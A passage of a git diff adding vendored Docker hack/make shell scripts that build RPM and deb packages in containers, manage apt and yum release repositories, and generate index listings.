+		( set -x && docker build -t "$tempImage" -f "$DEST/$version/Dockerfile.build" . )
+		docker run --rm "$tempImage" bash -c 'cd .. && tar -c *_*' | tar -xvC "$DEST/$version"
+		docker rmi "$tempImage"
+	done
+
+	bundle .integration-daemon-stop
+) 2>&1 | tee -a "$DEST/test.log"
diff --git a/vendor/github.com/docker/docker/hack/make/build-integration-test-binary b/vendor/github.com/docker/docker/hack/make/build-integration-test-binary
new file mode 100644
index 0000000000..2039be416f
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/build-integration-test-binary
@@ -0,0 +1,11 @@
+#!/bin/bash
+set -e
+
+rm -rf "$DEST"
+DEST="$DEST/../test-integration-cli"
+
+if [ -z $DOCKER_INTEGRATION_TESTS_VERIFIED ]; then
+	source ${MAKEDIR}/.integration-test-helpers
+	ensure_test_dir integration-cli "$DEST/test.main"
+	export DOCKER_INTEGRATION_TESTS_VERIFIED=1
+fi
diff --git a/vendor/github.com/docker/docker/hack/make/build-rpm b/vendor/github.com/docker/docker/hack/make/build-rpm
new file mode 100644
index 0000000000..7fec059392
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/build-rpm
@@ -0,0 +1,148 @@
+#!/bin/bash
+set -e
+
+# subshell so that we can export PATH and TZ without breaking other things
+(
+	export TZ=UTC # make sure our "date" variables are UTC-based
+
+	source "$(dirname "$BASH_SOURCE")/.integration-daemon-start"
+	source "$(dirname "$BASH_SOURCE")/.detect-daemon-osarch"
+
+	# TODO consider using frozen images for the dockercore/builder-rpm tags
+
+	rpmName=docker-engine
+	rpmVersion="$VERSION"
+	rpmRelease=1
+
+	# rpmRelease versioning is as follows
+	# Docker 1.7.0:  version=1.7.0, release=1
+	# Docker 1.7.0-rc1: version=1.7.0, release=0.1.rc1
+	# Docker 1.7.0-cs1: version=1.7.0.cs1, release=1
+	# Docker 1.7.0-cs1-rc1: version=1.7.0.cs1, release=0.1.rc1
+	# Docker 1.7.0-dev nightly: version=1.7.0, release=0.0.YYYYMMDD.HHMMSS.gitHASH
+
+	# if we have a "-rc*" suffix, set appropriate release
+	if [[ "$rpmVersion" =~ .*-rc[0-9]+$ ]] ; then
+		rcVersion=${rpmVersion#*-rc}
+		rpmVersion=${rpmVersion%-rc*}
+		rpmRelease="0.${rcVersion}.rc${rcVersion}"
+	fi
+
+	DOCKER_GITCOMMIT=$(git rev-parse --short HEAD)
+	if [ -n "$(git status --porcelain --untracked-files=no)" ]; then
+		DOCKER_GITCOMMIT="$DOCKER_GITCOMMIT-unsupported"
+	fi
+
+	# if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better
+	if [[ "$rpmVersion" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then
+		gitUnix="$(git log -1 --pretty='%at')"
+		gitDate="$(date --date "@$gitUnix" +'%Y%m%d.%H%M%S')"
+		gitCommit="$(git log -1 --pretty='%h')"
+		gitVersion="${gitDate}.git${gitCommit}"
+		# gitVersion is now something like '20150128.112847.17e840a'
+		rpmVersion="${rpmVersion%-dev}"
+		rpmRelease="0.0.$gitVersion"
+	fi
+
+	# Replace any other dashes with periods
+	rpmVersion="${rpmVersion/-/.}"
+
+	rpmPackager="$(awk -F ': ' '$1 == "Packager" { print $2; exit }' hack/make/.build-rpm/${rpmName}.spec)"
+	rpmDate="$(date +'%a %b %d %Y')"
+
+	# if go-md2man is available, pre-generate the man pages
+	make manpages
+
+	# Convert the CHANGELOG.md file into RPM changelog format
+	VERSION_REGEX="^\W\W (.*) \((.*)\)$"
+	ENTRY_REGEX="^[-+*] (.*)$"
+	while read -r line || [[ -n "$line" ]]; do
+		if [ -z "$line" ]; then continue; fi
+		if [[ "$line" =~ $VERSION_REGEX ]]; then
+			echo >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog
+			echo "* `date -d ${BASH_REMATCH[2]} '+%a %b %d %Y'` ${rpmPackager} - ${BASH_REMATCH[1]}" >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog
+		fi
+		if [[ "$line" =~ $ENTRY_REGEX ]]; then
+			echo "- ${BASH_REMATCH[1]//\`}" >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog
+		fi
+	done < CHANGELOG.md
+
+	builderDir="contrib/builder/rpm/${PACKAGE_ARCH}"
+	pkgs=( $(find "${builderDir}/"*/ -type d) )
+	if [ ! -z "$DOCKER_BUILD_PKGS" ]; then
+		pkgs=()
+		for p in $DOCKER_BUILD_PKGS; do
+			pkgs+=( "$builderDir/$p" )
+		done
+	fi
+	for dir in "${pkgs[@]}"; do
+		[ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; }
+		version="$(basename "$dir")"
+		suite="${version##*-}"
+
+		image="dockercore/builder-rpm:$version"
+		if ! docker inspect "$image" &> /dev/null; then
+			( set -x && docker build ${DOCKER_BUILD_ARGS} -t "$image" "$dir" )
+		fi
+
+		mkdir -p "$DEST/$version"
+		cat > "$DEST/$version/Dockerfile.build" <<-EOF
+			FROM $image
+			COPY . /usr/src/${rpmName}
+			WORKDIR /usr/src/${rpmName}
+			RUN mkdir -p /go/src/github.com/docker && mkdir -p /go/src/github.com/opencontainers
+		EOF
+
+		cat >> "$DEST/$version/Dockerfile.build" <<-EOF
+			# Install runc, containerd, proxy and tini
+			RUN TMP_GOPATH="/go" ./hack/dockerfile/install-binaries.sh runc-dynamic containerd-dynamic proxy-dynamic tini
+		EOF
+		if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then
+			echo 'ENV DOCKER_EXPERIMENTAL 1' >> "$DEST/$version/Dockerfile.build"
+		fi
+		cat >> "$DEST/$version/Dockerfile.build" <<-EOF
+			RUN mkdir -p /root/rpmbuild/SOURCES \
+				&& echo '%_topdir /root/rpmbuild' > /root/.rpmmacros
+			WORKDIR /root/rpmbuild
+			RUN ln -sfv /usr/src/${rpmName}/hack/make/.build-rpm SPECS
+			WORKDIR /root/rpmbuild/SPECS
+			RUN tar --exclude .git -r -C /usr/src -f /root/rpmbuild/SOURCES/${rpmName}.tar ${rpmName}
+			RUN tar --exclude .git -r -C /go/src/github.com/docker -f /root/rpmbuild/SOURCES/${rpmName}.tar containerd
+			RUN tar --exclude .git -r -C /go/src/github.com/docker/libnetwork/cmd -f /root/rpmbuild/SOURCES/${rpmName}.tar proxy
+			RUN tar --exclude .git -r -C /go/src/github.com/opencontainers -f /root/rpmbuild/SOURCES/${rpmName}.tar runc
+			RUN tar --exclude .git -r -C /go/ -f /root/rpmbuild/SOURCES/${rpmName}.tar tini
+			RUN gzip /root/rpmbuild/SOURCES/${rpmName}.tar
+			RUN { cat /usr/src/${rpmName}/contrib/builder/rpm/${PACKAGE_ARCH}/changelog; } >> ${rpmName}.spec && tail >&2 ${rpmName}.spec
+			RUN rpmbuild -ba \
+				--define '_gitcommit $DOCKER_GITCOMMIT' \
+				--define '_release $rpmRelease' \
+				--define '_version $rpmVersion' \
+				--define '_origversion $VERSION' \
+				--define '_experimental ${DOCKER_EXPERIMENTAL:-0}' \
+				${rpmName}.spec
+		EOF
+		# selinux policy referencing systemd things won't work on non-systemd versions
+		# of centos or rhel, which we don't support anyways
+		if [ "${suite%.*}" -gt 6 ] && [[ "$version" != opensuse* ]]; then
+			selinuxDir="selinux"
+			if [ -d "./contrib/selinux-$version" ]; then
+				selinuxDir="selinux-${version}"
+			fi
+			cat >> "$DEST/$version/Dockerfile.build" <<-EOF
+				RUN tar -cz -C /usr/src/${rpmName}/contrib/${selinuxDir} -f /root/rpmbuild/SOURCES/${rpmName}-selinux.tar.gz ${rpmName}-selinux
+				RUN rpmbuild -ba \
+						--define '_gitcommit $DOCKER_GITCOMMIT' \
+						--define '_release $rpmRelease' \
+						--define '_version $rpmVersion' \
+						--define '_origversion $VERSION' \
+						${rpmName}-selinux.spec
+			EOF
+		fi
+		tempImage="docker-temp/build-rpm:$version"
+		( set -x && docker build -t "$tempImage" -f $DEST/$version/Dockerfile.build . )
+		docker run --rm "$tempImage" bash -c 'cd /root/rpmbuild && tar -c *RPMS' | tar -xvC "$DEST/$version"
+		docker rmi "$tempImage"
+	done
+
+	source "$(dirname "$BASH_SOURCE")/.integration-daemon-stop"
+) 2>&1 | tee -a $DEST/test.log
diff --git a/vendor/github.com/docker/docker/hack/make/clean-apt-repo b/vendor/github.com/docker/docker/hack/make/clean-apt-repo
new file mode 100755
index 0000000000..1c37d98e40
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/clean-apt-repo
@@ -0,0 +1,43 @@
+#!/bin/bash
+set -e
+
+# This script cleans the experimental pool for the apt repo.
+# This is useful when there are a lot of old experimental debs and you only want to keep the most recent.
+#
+
+: ${DOCKER_RELEASE_DIR:=$DEST}
+APTDIR=$DOCKER_RELEASE_DIR/apt/repo/pool/experimental
+: ${DOCKER_ARCHIVE_DIR:=$DEST/archive}
+DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+
+latest_versions=$(dpkg-scanpackages "$APTDIR" /dev/null 2>/dev/null | awk -F ': ' '$1 == "Filename" { print $2 }')
+
+# get the latest version
+latest_docker_engine_file=$(echo "$latest_versions" | grep docker-engine)
+latest_docker_engine_version=$(basename ${latest_docker_engine_file%~*})
+
+echo "latest docker-engine version: $latest_docker_engine_version"
+
+# remove all the files that are not that version in experimental
+pool_dir=$(dirname "$latest_docker_engine_file")
+old_pkgs=( $(ls "$pool_dir" | grep -v "^${latest_docker_engine_version}" | grep "${latest_docker_engine_version%%~git*}") )
+
+echo "${old_pkgs[@]}"
+
+mkdir -p "$DOCKER_ARCHIVE_DIR"
+for old_pkg in "${old_pkgs[@]}"; do
+	echo "moving ${pool_dir}/${old_pkg} to $DOCKER_ARCHIVE_DIR"
+	mv "${pool_dir}/${old_pkg}" "$DOCKER_ARCHIVE_DIR"
+done
+
+echo
+echo "$pool_dir now has contents:"
+ls "$pool_dir"
+
+# now regenerate release files for experimental
+export COMPONENT=experimental
+source "${DIR}/update-apt-repo"
+
+echo "You will now want to: "
+echo "   - re-sign the repo with hack/make/sign-repo"
+echo "   - re-generate index files with hack/make/generate-index-listing"
diff --git a/vendor/github.com/docker/docker/hack/make/clean-yum-repo b/vendor/github.com/docker/docker/hack/make/clean-yum-repo
new file mode 100755
index 0000000000..1cafbbd97f
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/clean-yum-repo
@@ -0,0 +1,20 @@
+#!/bin/bash
+set -e
+
+# This script cleans the experimental pool for the yum repo.
+# This is useful when there are a lot of old experimental rpms and you only want to keep the most recent.
+#
+
+: ${DOCKER_RELEASE_DIR:=$DEST}
+YUMDIR=$DOCKER_RELEASE_DIR/yum/repo/experimental
+
+suites=( $(find "$YUMDIR" -mindepth 1 -maxdepth 1 -type d) )
+
+for suite in "${suites[@]}"; do
+	echo "cleanup in: $suite"
+	( set -x; repomanage -k2 --old "$suite" | xargs rm -f )
+done
+
+echo "You will now want to: "
+echo "   - re-sign the repo with hack/make/sign-repo"
+echo "   - re-generate index files with hack/make/generate-index-listing"
diff --git a/vendor/github.com/docker/docker/hack/make/cover b/vendor/github.com/docker/docker/hack/make/cover
new file mode 100644
index 0000000000..08e28e3fea
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/cover
@@ -0,0 +1,15 @@
+#!/bin/bash
+set -e
+
+bundle_cover() {
+	coverprofiles=( "$DEST/../"*"/coverprofiles/"* )
+	for p in "${coverprofiles[@]}"; do
+		echo
+		(
+			set -x
+			go tool cover -func="$p"
+		)
+	done
+}
+
+bundle_cover 2>&1 | tee "$DEST/report.log"
diff --git a/vendor/github.com/docker/docker/hack/make/cross b/vendor/github.com/docker/docker/hack/make/cross
new file mode 100644
index 0000000000..6d672b17c3
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/cross
@@ -0,0 +1,46 @@
+#!/bin/bash
+set -e
+
+# explicit list of os/arch combos that support being a daemon
+declare -A daemonSupporting
+daemonSupporting=(
+	[linux/amd64]=1
+	[windows/amd64]=1
+)
+
+# if we have our linux/amd64 version compiled, let's symlink it in
+if [ -x "$DEST/../binary-daemon/dockerd-$VERSION" ]; then
+	arch=$(go env GOHOSTARCH)
+	mkdir -p "$DEST/linux/${arch}"
+	(
+		cd "$DEST/linux/${arch}"
+		ln -s ../../../binary-daemon/* ./
+		ln -s ../../../binary-client/* ./
+	)
+	echo "Created symlinks:" "$DEST/linux/${arch}/"*
+fi
+
+for platform in $DOCKER_CROSSPLATFORMS; do
+	(
+		export KEEPDEST=1
+		export DEST="$DEST/$platform" # bundles/VERSION/cross/GOOS/GOARCH/docker-VERSION
+		mkdir -p "$DEST"
+		ABS_DEST="$(cd "$DEST" && pwd -P)"
+		export GOOS=${platform%/*}
+		export GOARCH=${platform##*/}
+
+		if [ "$GOOS" != "solaris" ]; then
+			# TODO. Solaris cannot be cross build because of CGO calls.
+			if [ -z "${daemonSupporting[$platform]}" ]; then
+				# we just need a simple client for these platforms
+				export LDFLAGS_STATIC_DOCKER=""
+				# remove the "daemon" build tag from platforms that aren't supported
+				export BUILDFLAGS=( "${ORIG_BUILDFLAGS[@]/ daemon/}" )
+				source "${MAKEDIR}/binary-client"
+			else
+				source "${MAKEDIR}/binary-client"
+				source "${MAKEDIR}/binary-daemon"
+			fi
+		fi
+	)
+done
diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary b/vendor/github.com/docker/docker/hack/make/dynbinary
new file mode 100644
index 0000000000..1a435dc4bf
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/dynbinary
@@ -0,0 +1,15 @@
+#!/bin/bash
+set -e
+
+# This script exists as backwards compatibility for CI
+(
+    DEST="${DEST}-client"
+    ABS_DEST="${ABS_DEST}-client"
+    . hack/make/dynbinary-client
+)
+(
+
+    DEST="${DEST}-daemon"
+    ABS_DEST="${ABS_DEST}-daemon"
+    . hack/make/dynbinary-daemon
+)
diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary-client b/vendor/github.com/docker/docker/hack/make/dynbinary-client
new file mode 100644
index 0000000000..e4b7741848
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/dynbinary-client
@@ -0,0 +1,12 @@
+#!/bin/bash
+set -e
+
+(
+	export BINARY_SHORT_NAME='docker'
+	export GO_PACKAGE='github.com/docker/docker/cmd/docker'
+	export IAMSTATIC='false'
+	export LDFLAGS_STATIC_DOCKER=''
+	export BUILDFLAGS=( "${BUILDFLAGS[@]/netgo /}" ) # disable netgo, since we don't need it for a dynamic binary
+	export BUILDFLAGS=( "${BUILDFLAGS[@]/static_build /}" ) # we're not building a "static" binary here
+	source "${MAKEDIR}/.binary"
+)
diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary-daemon b/vendor/github.com/docker/docker/hack/make/dynbinary-daemon
new file mode 100644
index 0000000000..090a916f65
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/dynbinary-daemon
@@ -0,0 +1,12 @@
+#!/bin/bash
+set -e
+
+(
+	export BINARY_SHORT_NAME='dockerd'
+	export GO_PACKAGE='github.com/docker/docker/cmd/dockerd'
+	export IAMSTATIC='false'
+	export LDFLAGS_STATIC_DOCKER=''
+	export BUILDFLAGS=( "${BUILDFLAGS[@]/netgo /}" ) # disable netgo, since we don't need it for a dynamic binary
+	export BUILDFLAGS=( "${BUILDFLAGS[@]/static_build /}" ) # we're not building a "static" binary here
+	source "${MAKEDIR}/.binary"
+)
diff --git a/vendor/github.com/docker/docker/hack/make/generate-index-listing b/vendor/github.com/docker/docker/hack/make/generate-index-listing
new file mode 100755
index 0000000000..ec44171f81
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/generate-index-listing
@@ -0,0 +1,74 @@
+#!/bin/bash
+set -e
+
+# This script generates index files for the directory structure
+# of the apt and yum repos
+
+: ${DOCKER_RELEASE_DIR:=$DEST}
+APTDIR=$DOCKER_RELEASE_DIR/apt
+YUMDIR=$DOCKER_RELEASE_DIR/yum
+
+if [ ! -d $APTDIR ] && [ ! -d $YUMDIR ]; then
+	echo >&2 'release-rpm or release-deb must be run before generate-index-listing'
+	exit 1
+fi
+
+create_index() {
+	local directory=$1
+	local original=$2
+	local cleaned=${directory#$original}
+
+	# the index file to create
+	local index_file="${directory}/index"
+
+	# cd into dir & touch the index file
+	cd $directory
+	touch $index_file
+
+	# print the html header
+	cat <<-EOF > "$index_file"
+	<!DOCTYPE html>
+	<html>
+	<head><title>Index of ${cleaned}/</title></head>
+	<body bgcolor="white">
+	<h1>Index of ${cleaned}/</h1><hr>
+	<pre><a href="../">../</a>
+	EOF
+
+	# start of content output
+	(
+	# change IFS locally within subshell so the for loop saves line correctly to L var
+	IFS=$'\n';
+
+	# pretty sweet, will mimick the normal apache output. skipping "index" and hidden files
+	for L in $(find -L . -mount -depth -maxdepth 1 -type f ! -name 'index' ! -name '.*' -prune -printf "<a href=\"%f\">%f|@_@%Td-%Tb-%TY %Tk:%TM  @%f@\n"|sort|column -t -s '|' | sed 's,\([\ ]\+\)@_@,</a>\1,g');
+	do
+		# file
+		F=$(sed -e 's,^.*@\([^@]\+\)@.*$,\1,g'<<<"$L");
+
+		# file with file size
+		F=$(du -bh $F | cut -f1);
+
+		# output with correct format
+		sed -e 's,\ @.*$, '"$F"',g'<<<"$L";
+	done;
+	) >> $index_file;
+
+	# now output a list of all directories in this dir (maxdepth 1) other than '.' outputting in a sorted manner exactly like apache
+	find -L . -mount -depth -maxdepth 1 -type d ! -name '.' -printf "<a href=\"%f\">%-43f@_@%Td-%Tb-%TY %Tk:%TM  -\n"|sort -d|sed 's,\([\ ]\+\)@_@,/</a>\1,g' >> $index_file
+
+	# print the footer html
+	echo "</pre><hr></body></html>" >> $index_file
+
+}
+
+get_dirs() {
+	local directory=$1
+
+	for d in `find ${directory} -type d`; do
+		create_index $d $directory
+	done
+}
+
+get_dirs $APTDIR
+get_dirs $YUMDIR
diff --git a/vendor/github.com/docker/docker/hack/make/install-binary b/vendor/github.com/docker/docker/hack/make/install-binary
new file mode 100644
index 0000000000..82cbc79933
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/install-binary
@@ -0,0 +1,12 @@
+#!/bin/bash
+
+set -e
+rm -rf "$DEST"
+
+(
+	source "${MAKEDIR}/install-binary-client"
+)
+
+(
+	source "${MAKEDIR}/install-binary-daemon"
+)
diff --git a/vendor/github.com/docker/docker/hack/make/install-binary-client b/vendor/github.com/docker/docker/hack/make/install-binary-client
new file mode 100644
index 0000000000..6c80452659
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/install-binary-client
@@ -0,0 +1,10 @@
+#!/bin/bash
+
+set -e
+rm -rf "$DEST"
+
+(
+	DEST="$(dirname $DEST)/binary-client"
+	source "${MAKEDIR}/.binary-setup"
+	install_binary "${DEST}/${DOCKER_CLIENT_BINARY_NAME}"
+)
diff --git a/vendor/github.com/docker/docker/hack/make/install-binary-daemon b/vendor/github.com/docker/docker/hack/make/install-binary-daemon
new file mode 100644
index 0000000000..08a2d69b96
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/install-binary-daemon
@@ -0,0 +1,16 @@
+#!/bin/bash
+
+set -e
+rm -rf "$DEST"
+
+(
+	DEST="$(dirname $DEST)/binary-daemon"
+	source "${MAKEDIR}/.binary-setup"
+	install_binary "${DEST}/${DOCKER_DAEMON_BINARY_NAME}"
+	install_binary "${DEST}/${DOCKER_RUNC_BINARY_NAME}"
+	install_binary "${DEST}/${DOCKER_CONTAINERD_BINARY_NAME}"
+	install_binary "${DEST}/${DOCKER_CONTAINERD_CTR_BINARY_NAME}"
+	install_binary "${DEST}/${DOCKER_CONTAINERD_SHIM_BINARY_NAME}"
+	install_binary "${DEST}/${DOCKER_PROXY_BINARY_NAME}"
+	install_binary "${DEST}/${DOCKER_INIT_BINARY_NAME}"
+)
diff --git a/vendor/github.com/docker/docker/hack/make/install-script b/vendor/github.com/docker/docker/hack/make/install-script
new file mode 100644
index 0000000000..feadac2f38
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/install-script
@@ -0,0 +1,63 @@
+#!/bin/bash
+set -e
+
+# This script modifies the install.sh script for domains and keys other than
+# those used by the primary opensource releases.
+#
+# You can provide `url`, `yum_url`, `apt_url` and optionally `gpg_fingerprint`
+# or `GPG_KEYID` as environment variables, or the defaults for open source are used.
+#
+# The lower-case variables are substituted into install.sh.
+#
+# gpg_fingerprint and GPG_KEYID are optional, defaulting to the opensource release
+# key ("releasedocker"). Other GPG_KEYIDs will require you to mount a volume with
+# the correct contents to /root/.gnupg.
+#
+# It outputs the modified `install.sh` file to $DOCKER_RELEASE_DIR (default: $DEST)
+#
+# Example usage:
+#
+# docker run \
+# --rm \
+# --privileged \
+# -e "GPG_KEYID=deadbeef" \
+# -e "GNUPGHOME=/root/.gnupg" \
+# -v $HOME/.gnupg:/root/.gnupg \
+# -v $(pwd):/go/src/github.com/docker/docker/bundles \
+# "$IMAGE_DOCKER" \
+# hack/make.sh install-script
+
+: ${DOCKER_RELEASE_DIR:=$DEST}
+: ${GPG_KEYID:=releasedocker}
+
+DEFAULT_URL="https://get.docker.com/"
+DEFAULT_APT_URL="https://apt.dockerproject.org"
+DEFAULT_YUM_URL="https://yum.dockerproject.org"
+DEFAULT_GPG_FINGERPRINT="58118E89F3A912897C070ADBF76221572C52609D"
+
+: ${url:=$DEFAULT_URL}
+: ${apt_url:=$DEFAULT_APT_URL}
+: ${yum_url:=$DEFAULT_YUM_URL}
+if [[ "$GPG_KEYID" == "releasedocker" ]] ; then
+	: ${gpg_fingerprint:=$DEFAULT_GPG_FINGERPRINT}
+fi
+
+DEST_FILE="$DOCKER_RELEASE_DIR/install.sh"
+
+bundle_install_script() {
+	mkdir -p "$DOCKER_RELEASE_DIR"
+
+	if [[ -z "$gpg_fingerprint" ]] ; then
+		# NOTE: if no key matching key is in /root/.gnupg, this will fail
+		gpg_fingerprint=$(gpg --with-fingerprint -k "$GPG_KEYID" | grep "Key fingerprint" | awk -F "=" '{print $2};' | tr -d ' ')
+	fi
+
+	cp hack/install.sh "$DEST_FILE"
+	sed -i.bak 's#^url=".*"$#url="'"$url"'"#' "$DEST_FILE"
+	sed -i.bak 's#^apt_url=".*"$#apt_url="'"$apt_url"'"#' "$DEST_FILE"
+	sed -i.bak 's#^yum_url=".*"$#yum_url="'"$yum_url"'"#' "$DEST_FILE"
+	sed -i.bak 's#^gpg_fingerprint=".*"$#gpg_fingerprint="'"$gpg_fingerprint"'"#' "$DEST_FILE"
+	rm "${DEST_FILE}.bak"
+}
+
+bundle_install_script
diff --git a/vendor/github.com/docker/docker/hack/make/release-deb b/vendor/github.com/docker/docker/hack/make/release-deb
new file mode 100755
index 0000000000..ed65fe2f5f
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/release-deb
@@ -0,0 +1,163 @@
+#!/bin/bash
+set -e
+
+# This script creates the apt repos for the .deb files generated by hack/make/build-deb
+#
+# The following can then be used as apt sources:
+# 	deb http://apt.dockerproject.org/repo $distro-$release $version
+#
+# For example:
+#	deb http://apt.dockerproject.org/repo ubuntu-trusty main
+#	deb http://apt.dockerproject.org/repo ubuntu-trusty testing
+#	deb http://apt.dockerproject.org/repo debian-wheezy experimental
+#	deb http://apt.dockerproject.org/repo debian-jessie main
+#
+# ... and so on and so forth for the builds created by hack/make/build-deb
+
+: ${DOCKER_RELEASE_DIR:=$DEST}
+: ${GPG_KEYID:=releasedocker}
+APTDIR=$DOCKER_RELEASE_DIR/apt/repo
+
+# setup the apt repo (if it does not exist)
+mkdir -p "$APTDIR/conf" "$APTDIR/db" "$APTDIR/dists"
+
+# supported arches/sections
+arches=( amd64 i386 armhf )
+
+# Preserve existing components but don't add any non-existing ones
+for component in main testing experimental ; do
+	exists=$(find "$APTDIR/dists" -mindepth 2 -maxdepth 2 -type d -name "$component" -print -quit)
+	if [ -n "$exists" ] ; then
+		components+=( $component )
+	fi
+done
+
+# set the component for the version being released
+component="main"
+
+if [[ "$VERSION" == *-rc* ]]; then
+	component="testing"
+fi
+
+if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then
+	component="experimental"
+fi
+
+# Make sure our component is in the list of components
+if [[ ! "${components[*]}" =~ $component ]] ; then
+	components+=( $component )
+fi
+
+# create apt-ftparchive file on every run. This is essential to avoid
+# using stale versions of the config file that could cause unnecessary
+# refreshing of bits for EOL-ed releases.
+cat <<-EOF > "$APTDIR/conf/apt-ftparchive.conf"
+Dir {
+	ArchiveDir "${APTDIR}";
+	CacheDir "${APTDIR}/db";
+};
+
+Default {
+	Packages::Compress ". gzip bzip2";
+	Sources::Compress ". gzip bzip2";
+	Contents::Compress ". gzip bzip2";
+};
+
+TreeDefault {
+	BinCacheDB "packages-\$(SECTION)-\$(ARCH).db";
+	Directory "pool/\$(SECTION)";
+	Packages "\$(DIST)/\$(SECTION)/binary-\$(ARCH)/Packages";
+	SrcDirectory "pool/\$(SECTION)";
+	Sources "\$(DIST)/\$(SECTION)/source/Sources";
+	Contents "\$(DIST)/\$(SECTION)/Contents-\$(ARCH)";
+	FileList "$APTDIR/\$(DIST)/\$(SECTION)/filelist";
+};
+EOF
+
+for dir in bundles/$VERSION/build-deb/*/; do
+	version="$(basename "$dir")"
+	suite="${version//debootstrap-}"
+
+	cat <<-EOF
+	Tree "dists/${suite}" {
+		Sections "${components[*]}";
+		Architectures "${arches[*]}";
+	}
+
+	EOF
+done >> "$APTDIR/conf/apt-ftparchive.conf"
+
+cat <<-EOF > "$APTDIR/conf/docker-engine-release.conf"
+APT::FTPArchive::Release::Origin "Docker";
+APT::FTPArchive::Release::Components "${components[*]}";
+APT::FTPArchive::Release::Label "Docker APT Repository";
+APT::FTPArchive::Release::Architectures "${arches[*]}";
+EOF
+
+# release the debs
+for dir in bundles/$VERSION/build-deb/*/; do
+	version="$(basename "$dir")"
+	codename="${version//debootstrap-}"
+
+	tempdir="$(mktemp -d /tmp/tmp-docker-release-deb.XXXXXXXX)"
+	DEBFILE=( "$dir/docker-engine"*.deb )
+
+	# add the deb for each component for the distro version into the
+	# pool (if it is not there already)
+	mkdir -p "$APTDIR/pool/$component/d/docker-engine/"
+ 	for deb in ${DEBFILE[@]}; do
+		d=$(basename "$deb")
+		# We do not want to generate a new deb if it has already been
+		# copied into the APTDIR
+		if [ ! -f "$APTDIR/pool/$component/d/docker-engine/$d" ]; then
+			cp "$deb" "$tempdir/"
+			# if we have a $GPG_PASSPHRASE we may as well
+			# dpkg-sign before copying the deb into the pool
+			if [ ! -z "$GPG_PASSPHRASE" ]; then
+				dpkg-sig -g "--no-tty  --digest-algo 'sha512' --passphrase '$GPG_PASSPHRASE'" \
+					-k "$GPG_KEYID" --sign builder "$tempdir/$d"
+			fi
+			mv "$tempdir/$d" "$APTDIR/pool/$component/d/docker-engine/"
+		fi
+	done
+
+	rm -rf "$tempdir"
+
+	# build the right directory structure, needed for apt-ftparchive
+	for arch in "${arches[@]}"; do
+		for c in "${components[@]}"; do
+			mkdir -p "$APTDIR/dists/$codename/$c/binary-$arch"
+		done
+	done
+
+	# update the filelist for this codename/component
+	find "$APTDIR/pool/$component" \
+		-name *~${codename}*.deb -o \
+		-name *~${codename#*-}*.deb > "$APTDIR/dists/$codename/$component/filelist"
+done
+
+# run the apt-ftparchive commands so we can have pinning
+apt-ftparchive generate "$APTDIR/conf/apt-ftparchive.conf"
+
+for dir in bundles/$VERSION/build-deb/*/; do
+	version="$(basename "$dir")"
+	codename="${version//debootstrap-}"
+
+	apt-ftparchive \
+		-c "$APTDIR/conf/docker-engine-release.conf" \
+		-o "APT::FTPArchive::Release::Codename=$codename" \
+		-o "APT::FTPArchive::Release::Suite=$codename" \
+		release \
+		"$APTDIR/dists/$codename" > "$APTDIR/dists/$codename/Release"
+
+	for arch in "${arches[@]}"; do
+		apt-ftparchive \
+			-c "$APTDIR/conf/docker-engine-release.conf" \
+			-o "APT::FTPArchive::Release::Codename=$codename" \
+			-o "APT::FTPArchive::Release::Suite=$codename" \
+			-o "APT::FTPArchive::Release::Components=$component" \
+			-o "APT::FTPArchive::Release::Architecture=$arch" \
+			release \
+			"$APTDIR/dists/$codename/$component/binary-$arch" > "$APTDIR/dists/$codename/$component/binary-$arch/Release"
+	done
+done
diff --git a/vendor/github.com/docker/docker/hack/make/release-rpm b/vendor/github.com/docker/docker/hack/make/release-rpm
new file mode 100755
index 0000000000..d7e3ec4f8a
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/release-rpm
@@ -0,0 +1,71 @@
+#!/bin/bash
+set -e
+
+# This script creates the yum repos for the .rpm files generated by hack/make/build-rpm
+#
+# The following can then be used as a yum repo:
+# 	http://yum.dockerproject.org/repo/$release/$distro/$distro-version
+#
+# For example:
+# 	http://yum.dockerproject.org/repo/main/fedora/23
+# 	http://yum.dockerproject.org/repo/testing/centos/7
+# 	http://yum.dockerproject.org/repo/experimental/fedora/23
+# 	http://yum.dockerproject.org/repo/main/centos/7
+#
+# ... and so on and so forth for the builds created by hack/make/build-rpm
+
+: ${DOCKER_RELEASE_DIR:=$DEST}
+YUMDIR=$DOCKER_RELEASE_DIR/yum/repo
+: ${GPG_KEYID:=releasedocker}
+
+# get the release
+release="main"
+
+if [[ "$VERSION" == *-rc* ]]; then
+	release="testing"
+fi
+
+if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then
+	release="experimental"
+fi
+
+# Setup the yum repo
+for dir in bundles/$VERSION/build-rpm/*/; do
+	version="$(basename "$dir")"
+	suite="${version##*-}"
+	distro="${version%-*}"
+
+	REPO=$YUMDIR/$release/$distro
+
+	# if the directory does not exist, initialize the yum repo
+	if [[ ! -d $REPO/$suite/Packages ]]; then
+		mkdir -p "$REPO/$suite/Packages"
+
